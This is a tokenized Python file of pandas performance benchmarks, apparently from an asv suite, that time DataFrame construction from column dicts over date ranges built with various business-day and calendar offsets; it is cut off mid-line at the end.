<s> from . pandas_vb_common import * <EOL> try : <EOL> from pandas . tseries . offsets import * <EOL> except : <EOL> from pandas . core . datetools import * <EOL> class frame_ctor_dtindex_BDayx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BDay ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BDayx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BDayx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BDay ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BDayx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BMonthBeginx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BMonthBegin ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BMonthBeginx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BMonthBeginx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BMonthBegin ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BMonthBeginx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BMonthEndx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BMonthEnd ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BMonthEndx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BMonthEndx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BMonthEnd ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BMonthEndx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BQuarterBeginx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BQuarterBegin ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BQuarterBeginx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BQuarterBeginx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BQuarterBegin ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BQuarterBeginx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BQuarterEndx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BQuarterEnd ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BQuarterEndx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BQuarterEndx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BQuarterEnd ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BQuarterEndx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BYearBeginx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BYearBegin ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BYearBeginx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BYearBeginx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BYearBegin ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BYearBeginx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BYearEndx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BYearEnd ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BYearEndx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BYearEndx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BYearEnd ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BYearEndx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BusinessDayx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BusinessDay ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BusinessDayx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BusinessDayx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BusinessDay ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BusinessDayx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BusinessHourx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BusinessHour ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BusinessHourx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BusinessHourx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BusinessHour ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BusinessHourx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CBMonthBeginx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( CBMonthBegin ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_CBMonthBeginx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CBMonthBeginx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( CBMonthBegin ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_CBMonthBeginx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CBMonthEndx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( CBMonthEnd ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_CBMonthEndx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CBMonthEndx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( CBMonthEnd ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_CBMonthEndx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CDayx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( CDay ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_CDayx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CDayx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( CDay ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_CDayx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CustomBusinessDayx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( CustomBusinessDay ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_CustomBusinessDayx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CustomBusinessDayx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( CustomBusinessDay ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . 